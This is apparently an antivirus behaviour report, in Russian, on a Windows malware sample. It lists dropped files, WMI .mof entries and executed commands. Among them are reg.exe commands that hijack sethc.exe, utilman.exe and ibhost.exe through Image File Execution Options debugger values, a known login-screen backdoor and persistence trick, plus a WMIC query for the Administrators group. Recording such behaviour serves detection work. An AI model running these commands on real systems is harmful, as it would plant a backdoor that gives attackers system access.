Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'debugger' = 'drmsvc.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe] 'debugger' = 'drmsvc.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe] 'debugger' = 'wpmsvc.exe'
- <Текущая директория>\SH.bat
- <Текущая директория>\U.bat
- <Текущая директория>\prop.exe
- %TEMP%\tmp1.tmp
- %TEMP%\tmp2.tmp
- <SYSTEM32>\wbem\AutoRecover\C8463ECBE33BC240263A0B094E46D510.mof
- %TEMP%\tmp3.tmp
- <SYSTEM32>\wbem\AutoRecover\23BDE61F1F4FACE17E9B0C01F2A1FD9B.mof
- %TEMP%\tmp1.tmp
- %TEMP%\tmp2.tmp
- %TEMP%\tmp3.tmp
- ClassName: 'EDIT' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\U.bat" "
- '<SYSTEM32>\cmd.exe' /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
- '<SYSTEM32>\find.exe' "="
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\SH.bat" "
- '<SYSTEM32>\attrib.exe' -h -s -r <SYSTEM32>\dllcache
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f